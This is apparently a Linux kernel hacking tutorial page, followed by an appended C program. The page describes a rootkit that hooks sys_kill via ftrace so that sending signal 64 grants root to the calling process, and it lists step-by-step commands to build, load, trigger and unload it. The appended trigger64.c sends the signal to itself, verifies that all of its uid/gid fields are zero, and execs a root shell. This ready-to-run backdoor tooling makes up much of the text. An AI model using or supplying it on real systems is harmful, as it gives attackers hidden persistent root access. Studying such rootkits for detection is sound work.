Harvey Phillips, authored on 12 Jan 2021

Linux Kernel Hacking

3.3: Custom Signals To Give Root Privileges To A Process

Updated to install the hook with ftrace instead of directly modifying kernel memory.

There is now a blog post explaining this module in more detail! Check it out here!

As in Section 3.2, we hook sys_kill with ftrace. When the hook sees signal 64 it calls a function that gives root to the process that made the kill call and returns without invoking the real sys_kill. Signal 64 is SIGRTMAX, the highest real-time signal on Linux, and ordinary programs almost never use it, so as before we can hijack it without colliding with anything.

According to credentials.rst, a task may only alter its own credentials: prepare_creds() hands back a modifiable copy of the current task's cred struct, we set the uid/gid fields in the copy to 0, and commit_creds() installs it. There is no supported way to rewrite another running task's cred struct, so the hook cannot elevate the pid named in the kill call; it elevates the caller. That means we can't give an already running process root privileges unless the 64 signal is sent from that process! Quite a clever security feature!

All we have to do is call kill() with signal 64 against any pid (as before, the signal is never actually delivered; the hook swallows it) and the calling process ends up being root!

To use:

  • Build with make
  • Load with insmod rootkit.ko
  • Confirm that you currently are not root with whoami
  • Send signal 64 to any pid, e.g. kill -64 1
    • Note that the signal won't actually be sent to the pid you specify (the hook returns before the real sys_kill runs), so any number will do, even 1!
    • This works from an interactive shell because kill is a shell builtin in bash and most other shells: the kill syscall is made by the shell process itself, so it is the shell that becomes root, and every command it spawns afterwards inherits that. Running /bin/kill instead would elevate only that short-lived process.
  • Check whoami (or id) again, and observe that you are now root!
  • Unload with rmmod rootkit
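The following userspace program is an added example, not part of this module or the repository, that exercises the procedure above from a single process and illustrates the point made earlier that only the caller's credentials change. It assumes the page's hook behaviour (kill() with signal 64 returns 0 without delivering anything and elevates the caller); the file name trigger64.c, the use of /proc/self/status to read all four uid/gid fields, and the blocking/draining of SIGRTMAX so the program survives when the module is not loaded are choices made here.

```c
/* trigger64.c: userspace side of the "signal 64 grants root" technique.
 * Added example, not the rootkit's own code. Assumes a hooked sys_kill
 * that elevates the *calling* task when sig == 64 and never delivers it. */
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/types.h>

#define TRIGGER_SIG 64 /* SIGRTMAX on Linux: the highest real-time signal */

/* Parse a "Uid:" or "Gid:" line from /proc/self/status into the four ids the
 * kernel keeps per task (real, effective, saved, filesystem), i.e. the fields
 * a set_root() built on prepare_creds()/commit_creds() zeroes.
 * Returns the number of ids parsed (4 on success, 0 on a malformed line). */
int parse_id_line(const char *line, unsigned int out[4])
{
    const char *p = strchr(line, ':');
    int n;
    if (!p)
        return 0;
    n = sscanf(p + 1, "%u %u %u %u", &out[0], &out[1], &out[2], &out[3]);
    return n < 0 ? 0 : n;
}

/* Read real/effective/saved/fs uid and gid of this process from /proc.
 * Returns 0 when both lines were found and fully parsed, -1 otherwise. */
int read_creds(unsigned int uid[4], unsigned int gid[4])
{
    FILE *f = fopen("/proc/self/status", "r");
    char line[256];
    int got = 0;
    if (!f)
        return -1;
    while (fgets(line, sizeof line, f)) {
        if (!strncmp(line, "Uid:", 4) && parse_id_line(line, uid) == 4)
            got |= 1;
        if (!strncmp(line, "Gid:", 4) && parse_id_line(line, gid) == 4)
            got |= 2;
    }
    fclose(f);
    return got == 3 ? 0 : -1;
}

/* Send the trigger to ourselves. The signal is blocked first so that, if the
 * module is NOT loaded, the real SIGRTMAX cannot terminate us (its default
 * action); with the hook in place the signal is never queued at all.
 * Returns kill()'s result: 0 means the call was accepted by the kernel. */
int send_trigger(void)
{
    sigset_t set, old;
    struct timespec zero = { 0, 0 };
    int rc;
    sigemptyset(&set);
    sigaddset(&set, TRIGGER_SIG);
    sigprocmask(SIG_BLOCK, &set, &old);
    rc = kill(getpid(), TRIGGER_SIG);
    /* Drain a pending real signal (module absent) so it never fires later,
     * e.g. after exec into a shell that might unblock it. */
    sigtimedwait(&set, NULL, &zero);
    sigprocmask(SIG_SETMASK, &old, NULL);
    return rc;
}

/* True only if all four id fields are 0. geteuid() == 0 alone would miss a
 * half-done elevation that left suid or fsuid unchanged. */
int all_root(const unsigned int id[4])
{
    return id[0] == 0 && id[1] == 0 && id[2] == 0 && id[3] == 0;
}

int main(void)
{
    unsigned int uid[4] = { 0 }, gid[4] = { 0 };
    if (read_creds(uid, gid) == 0)
        printf("before: uid %u %u %u %u  gid %u %u %u %u\n", uid[0], uid[1],
               uid[2], uid[3], gid[0], gid[1], gid[2], gid[3]);
    if (send_trigger() != 0)
        perror("kill");
    if (read_creds(uid, gid) == 0)
        printf("after:  uid %u %u %u %u  gid %u %u %u %u\n", uid[0], uid[1],
               uid[2], uid[3], gid[0], gid[1], gid[2], gid[3]);
    if (all_root(uid) && all_root(gid)) {
        /* The elevated creds belong to this process, and exec keeps them,
         * so the shell we replace ourselves with is a root shell. */
        execl("/bin/sh", "sh", (char *)NULL);
        perror("execl");
    }
    fputs("not root: is rootkit.ko loaded?\n", stderr);
    return 1;
}
```

Build with cc -o trigger64 trigger64.c and run it as an unprivileged user with the module loaded; the "after" line should show all eight fields as 0 and you are dropped into a root shell. Without the module the trigger is harmless and the program exits with status 1, which makes it a convenient check for whether the hook is active.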